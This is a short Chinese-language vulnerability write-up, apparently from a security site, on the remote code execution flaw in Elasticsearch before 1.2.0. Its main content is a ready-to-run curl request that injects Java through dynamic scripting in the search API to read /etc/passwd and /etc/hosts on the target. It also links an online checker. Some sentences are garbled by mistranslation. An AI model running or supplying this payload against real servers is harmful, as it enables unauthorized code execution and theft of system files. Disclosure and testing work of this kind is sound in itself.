<p>Elasticsearch是一个流行的开源的搜索和分析引擎。</p><p>这是一个远程命令执行漏洞利用Elasticsearch,利用Elasticsearch 1.2.0 之前版本的默认配置。</p><p>问题出现在 REST API,在没有身份认证的情况下,搜索功能允许动态脚本执行,可用于远程该漏洞被发现在其他的原料药,这并不需要验证,在搜索功能允许动态脚本执行。攻击者可以利用它远程执行任何 Java 代码。<br></p><p>手动测试:</p><p>读取目标机器的 <font color="#e33737">/etc/passwd</font> 和 <font color="#e33737">/etc/hosts</font></p><pre class="">curl -XPOST 'http://localhost:9200/_search?pretty' -d '
{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      }
    }
  },
  "script_fields": {
    "/etc/hosts": {
      "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"
    },
    "/etc/passwd": {
      "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"
    }
  }
}
</pre><p></p><p>在线检测地址:<a href="http://tool.scanv.com/es.html" target="_blank">http://tool.scanv.com/es.html</a></p>
                      
                    
                  
                
              
             
        
          
全部评论 (2)